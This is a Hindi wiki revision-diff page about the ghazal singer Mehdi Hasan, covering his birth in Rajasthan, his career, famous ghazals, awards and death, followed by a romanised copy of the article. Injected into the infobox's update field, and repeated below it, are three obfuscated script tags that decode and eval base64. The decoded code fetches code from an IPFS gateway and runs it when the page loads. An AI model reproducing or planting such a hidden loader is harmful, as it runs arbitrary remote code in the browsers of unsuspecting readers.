Difference between revisions of "मेहदी हसन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
{{पुनरीक्षण}}
+
{{सूचना बक्सा कलाकार
'''मेहदी हसन''' (जन्म: [[18 जुलाई]] [[1927]]; मृत्यु: [[13 जून]] [[2012]]) एक प्रसिद्ध ग़ज़ल गायक थे। इन्हें 'ग़ज़ल का गायक' भी कहा जाता है। इन्हें ख़ाँ साहब के नाम से भी जाना जाता है।
+
|चित्र=Mehdi-hasan.jpg
 +
|चित्र का नाम=मेहदी हसन
 +
|पूरा नाम=मेहदी हसन ख़ान
 +
|प्रसिद्ध नाम=मेहदी हसन
 +
|अन्य नाम=ख़ान साहब
 +
|जन्म=[[18 जुलाई]] [[1927]]
 +
|जन्म भूमि=झुंझुनू, [[राजस्थान]] 
 +
|मृत्यु= [[13 जून]] [[2012]]
 +
|मृत्यु स्थान=[[कराची]], पाकिस्तान
 +
|अविभावक=उस्ताद अज़ीम ख़ाँ (पिता)
 +
|पति/पत्नी=
 +
|संतान=नौ बेटे और पाँच बेटियाँ
 +
|कर्म भूमि=ब्रिटिश भारत और [[पाकिस्तान]]
 +
|कर्म-क्षेत्र=संगीत
 +
|मुख्य रचनाएँ=रंजिश ही सही.., ज़िंदगी में तो सभी प्यार करते हैं..., गुलों में रंग भरे आदि
 +
|मुख्य फ़िल्में=
 +
|विषय=
 +
|शिक्षा=
 +
|विद्यालय=
 +
|पुरस्कार-उपाधि=तमगा-ए-इम्तियाज़, हिलाल-ए-इम्तियाज़ पुरस्कार, सहगल अवॉर्ड
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=पाकिस्तान
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|17:43, 14 जून 2012 (IST)}}
 +
}}
 +
'''मेहदी हसन''' (जन्म: [[18 जुलाई]] [[1927]] [[राजस्थान]]; मृत्यु: [[13 जून]] [[2012]] [[कराची]] ([[पाकिस्तान]])) एक प्रसिद्ध ग़ज़ल गायक थे। इन्हें 'ग़ज़ल का राजा' माना जाता है। इन्हें ख़ाँ साहब के नाम से भी जाना जाता है। वैसे तो ग़ज़ल के इस सरताज पर पाकिस्तान फ़ख़्र करता था मगर [[भारत]] में भी उनके मुरीद कुछ कम न थे। इसकी वजह ये थी कि मेंहदी हसन मूलत: [[राजस्थान]] के थे।
 
==जीवन परिचय==
 
==जीवन परिचय==
ग़ज़ल सम्राट मेहदी हसन का जन्म 18 जुलाई 1927 को [[राजस्थान]] के झुंझुनू के लूणा गाँव में हुआ था। मेहदी हसन को संगीत विरासत में मिला है। हसन मशहूर कलावंत संगीत घराने के थे। इन्हें संगीत की तालीम अपने वालिद उस्ताद अज़ीम ख़ाँ और चाचा उस्ताद इस्माइल ख़ाँ से मिली। [[भारत]]-[[पाकिस्तान|पाक]] के बँटवारे के बाद मेहदी हसन का परिवार पाकिस्तान चला गया था।
+
ग़ज़ल सम्राट मेहदी हसन का जन्म 18 जुलाई 1927 को [[राजस्थान]] के झुंझुनू के लूणा गाँव में हुआ था। मेहदी हसन को संगीत विरासत में मिला। हसन मशहूर कलावंत संगीत घराने के थे। इन्हें संगीत की तालीम अपने वालिद उस्ताद अज़ीम ख़ाँ और चाचा उस्ताद इस्माइल ख़ाँ से मिली। [[भारत]]-[[पाकिस्तान|पाक]] के बँटवारे के बाद मेहदी हसन का परिवार पाकिस्तान चला गया था। मेहदी हसन के दो विवाह हुए थे। इनके नौ बेटे और पाँच बेटियाँ हैं। उनके छह बेटे ग़ज़ल गायकी और संगीत क्षेत्र से जुड़े हैं।
==परिवार==
+
====गायकी की शुरुआत====
मेहदी हसन के दो विवाह हुए थे। इनके नौ बेटे और पाँच बेटियाँ हैं। उनके छह बेटे ग़ज़ल गायिकी और संगीत क्षेत्र से जुड़े हैं।
 
==पहला अवसर==
 
 
ख़ाँ साहब को सन 1935 में जब उनकी उम्र मात्र 8 वर्ष थी फ़ज़िल्का के एक समारोह में पहली बार गाने का अवसर मिला था। इस समारोह में इन्होंने [[ध्रुपद]] और [[ख़याल]] की गायकी की।  
 
ख़ाँ साहब को सन 1935 में जब उनकी उम्र मात्र 8 वर्ष थी फ़ज़िल्का के एक समारोह में पहली बार गाने का अवसर मिला था। इस समारोह में इन्होंने [[ध्रुपद]] और [[ख़याल]] की गायकी की।  
 
==कार्यक्षेत्र==
 
==कार्यक्षेत्र==
जीवन चलाने के लिए उन्होंने पहले एक साइकिल की दुकान में काम किया और बाद में बतौर कार मैकेनिक का काम किया। परंतु इन दिक्कतों के बावजूद ख़ाँ साहब का ग़ज़ल गायिकी के प्रति लगाव कम नहीं हुआ। ख़ाँ साहब दिनभर की मेहनत के बाद रोजाना ग़ज़ल का अभ्यास करते थे। मेहदी हसन को [[1957]] में एक गायक के रूप में पहली बार रेडियो पाकिस्तान में बतौर ठुमरी गायक की पहचान मिली। यहीं से उनकी क़ामयाबी का सफ़र शुरू हुआ। उनके ग़ज़ल कार्यक्रम दुनियाभर में आयोजित होने लगे। सन [[1980]] के बाद उनके बीमार होने से उनका गायन कम हो गया। मेहदी हसन ने क़रीब 54,000 ग़ज़लें, गीत और ठुमरी गाईं। इन्होंने [[ग़ालिब]], फ़ैज़ अहमद फ़ैज़, अहमद फ़राज़, [[मीर तक़ी मीर]] और [[बहादुर शाह ज़फ़र]] जैसे शायरों की ग़ज़लों को अपनी आवाज़ दी।  
+
जीवन चलाने के लिए उन्होंने पहले एक साइकिल की दुकान में काम किया और बाद में बतौर कार मैकेनिक का काम किया। परंतु इन दिक्कतों के बावजूद ख़ाँ साहब का ग़ज़ल गायकी के प्रति लगाव कम नहीं हुआ। ख़ाँ साहब दिनभर की मेहनत के बाद रोजाना ग़ज़ल का अभ्यास करते थे। मेहदी हसन को [[1957]] में एक गायक के रूप में पहली बार रेडियो पाकिस्तान में बतौर ठुमरी गायक की पहचान मिली। यहीं से उनकी क़ामयाबी का सफ़र शुरू हुआ। उनके ग़ज़ल कार्यक्रम दुनियाभर में आयोजित होने लगे। सन [[1980]] के बाद उनके बीमार होने से उनका गायन कम हो गया। मेहदी हसन ने क़रीब 54,000 ग़ज़लें, गीत और ठुमरी गाईं। इन्होंने [[ग़ालिब]], फ़ैज़ अहमद फ़ैज़, अहमद फ़राज़, [[मीर तक़ी मीर]] और [[बहादुर शाह ज़फ़र]] जैसे शायरों की ग़ज़लों को अपनी आवाज़ दी।  
 
==मशहूर ग़ज़लें==
 
==मशहूर ग़ज़लें==
* जिंदगी में तो सभी प्यार करते हैं...
+
* ज़िंदगी में तो सभी प्यार करते हैं...
 
* अब के हम बिछड़ के
 
* अब के हम बिछड़ के
 
* बात करनी मुझे
 
* बात करनी मुझे
Line 16: Line 46:
 
* यूं जिंदगी की राह में..
 
* यूं जिंदगी की राह में..
 
* मोहब्बत करने वाले
 
* मोहब्बत करने वाले
* हमें कोई गम नहीं था
+
* हमें कोई ग़म नहीं था
 
* रफ्ता रफ्ता वो मेरी
 
* रफ्ता रफ्ता वो मेरी
 
* न किसी की आंख का नूर
 
* न किसी की आंख का नूर
 
* शिकवा ना कर, गिला ना कर
 
* शिकवा ना कर, गिला ना कर
 
* गुलों में रंग भरे बाद-ए-नौबहार चले
 
* गुलों में रंग भरे बाद-ए-नौबहार चले
 
+
==सम्मान और पुरस्कार==
==पुरस्कार==
 
 
मेहदी हसन को कई पुरस्कारों से सम्मानित किया गया। जनरल अयूब ख़ाँ ने उन्हें तमगा-ए-इम्तियाज़, जनरल ज़िया उल हक़ ने प्राइड ऑफ़ परफ़ॉर्मेंस और जनरल परवेज़ मुशर्रफ़ ने हिलाल-ए-इम्तियाज़ पुरस्कार से सम्मानित किया था। इसके अलावा भारत ने 1979 में सहगल अवॉर्ड से सम्मनित किया।  
 
मेहदी हसन को कई पुरस्कारों से सम्मानित किया गया। जनरल अयूब ख़ाँ ने उन्हें तमगा-ए-इम्तियाज़, जनरल ज़िया उल हक़ ने प्राइड ऑफ़ परफ़ॉर्मेंस और जनरल परवेज़ मुशर्रफ़ ने हिलाल-ए-इम्तियाज़ पुरस्कार से सम्मानित किया था। इसके अलावा भारत ने 1979 में सहगल अवॉर्ड से सम्मनित किया।  
==निधन==
+
==अंतिम समय==
मेहदी हसन का निधन कंराची में सन 13 जून 2012 को फेंफड़ों का संक्रमण नामक बीमारी के कारण हो गया।  
+
मेहदी हसन का आख़िरी समय काफी तकलीफ़ में गुजरा। 12 सालों से लगातार बीमारी से जूझ रहे थे और उनका काफी वक्त अस्पताल में गुज़रता था। मेहदी हसन का निधन [[कराची]] में सन 13 जून 2012 को फेंफड़ों में संक्रमण के कारण हो गया।  
  
 
   
 
   
Line 33: Line 62:
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
+
*[http://www.youtube.com/watch?v=cgKDqh2ccuU रंजिश ही सही.. (यू-ट्यूब वीडियो)]
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{ग़ज़ल गायक}}
[[Category:नया पन्ना जून-2012]]
+
[[Category:ग़ज़ल गायक]][[Category:गायक]] [[Category:संगीत कोश]][[Category:कला कोश]][[Category:चरित कोश]]
  
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 12:13, 14 June 2012

mehadi hasan
poora nam mehadi hasan khan
prasiddh nam mehadi hasan
any nam khan sahab
janm 18 julaee 1927
janm bhoomi jhuanjhunoo, rajasthan
mrityu 13 joon 2012
mrityu sthan karachi, pakistan
santan nau bete aur paanch betiyaan
karm bhoomi british bharat aur pakistan
karm-kshetr sangit
mukhy rachanaean ranjish hi sahi.., ziandagi mean to sabhi pyar karate haian..., guloan mean rang bhare adi
puraskar-upadhi tamaga-e-imtiyaz, hilal-e-imtiyaz puraskar, sahagal av aaurd
nagarikata pakistan
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

mehadi hasan (janm: 18 julaee 1927 rajasthan; mrityu: 13 joon 2012 karachi (pakistan)) ek prasiddh gazal gayak the. inhean 'gazal ka raja' mana jata hai. inhean khaan sahab ke nam se bhi jana jata hai. vaise to gazal ke is sarataj par pakistan fakhr karata tha magar bharat mean bhi unake murid kuchh kam n the. isaki vajah ye thi ki meanhadi hasan moolat: rajasthan ke the.

jivan parichay

gazal samrat mehadi hasan ka janm 18 julaee 1927 ko rajasthan ke jhuanjhunoo ke loona gaanv mean hua tha. mehadi hasan ko sangit virasat mean mila. hasan mashahoor kalavant sangit gharane ke the. inhean sangit ki talim apane valid ustad azim khaan aur chacha ustad ismail khaan se mili. bharat-pak ke bantavare ke bad mehadi hasan ka parivar pakistan chala gaya tha. mehadi hasan ke do vivah hue the. inake nau bete aur paanch betiyaan haian. unake chhah bete gazal gayaki aur sangit kshetr se ju de haian.

gayaki ki shuruat

khaan sahab ko san 1935 mean jab unaki umr matr 8 varsh thi fazilka ke ek samaroh mean pahali bar gane ka avasar mila tha. is samaroh mean inhoanne dhrupad aur khayal ki gayaki ki.

karyakshetr

jivan chalane ke lie unhoanne pahale ek saikil ki dukan mean kam kiya aur bad mean bataur kar maikenik ka kam kiya. parantu in dikkatoan ke bavajood khaan sahab ka gazal gayaki ke prati lagav kam nahian hua. khaan sahab dinabhar ki mehanat ke bad rojana gazal ka abhyas karate the. mehadi hasan ko 1957 mean ek gayak ke roop mean pahali bar rediyo pakistan mean bataur thumari gayak ki pahachan mili. yahian se unaki qamayabi ka safar shuroo hua. unake gazal karyakram duniyabhar mean ayojit hone lage. san 1980 ke bad unake bimar hone se unaka gayan kam ho gaya. mehadi hasan ne qarib 54,000 gazalean, git aur thumari gaeean. inhoanne galib, faiz ahamad faiz, ahamad faraz, mir taqi mir aur bahadur shah zafar jaise shayaroan ki gazaloan ko apani avaz di.

mashahoor gazalean

  • ziandagi mean to sabhi pyar karate haian...
  • ab ke ham bichh d ke
  • bat karani mujhe
  • ranjish hi sahi..
  • yooan jiandagi ki rah mean..
  • mohabbat karane vale
  • hamean koee gam nahian tha
  • raphta raphta vo meri
  • n kisi ki aankh ka noor
  • shikava na kar, gila na kar
  • guloan mean rang bhare bad-e-naubahar chale

samman aur puraskar

mehadi hasan ko kee puraskaroan se sammanit kiya gaya. janaral ayoob khaan ne unhean tamaga-e-imtiyaz, janaral ziya ul haq ne praid aauf paraf aaurmeans aur janaral paravez musharraf ne hilal-e-imtiyaz puraskar se sammanit kiya tha. isake alava bharat ne 1979 mean sahagal av aaurd se sammanit kiya.

aantim samay

mehadi hasan ka akhiri samay kaphi takalif mean gujara. 12 saloan se lagatar bimari se joojh rahe the aur unaka kaphi vakt aspatal mean guzarata tha. mehadi hasan ka nidhan karachi mean san 13 joon 2012 ko pheanph doan mean sankraman ke karan ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh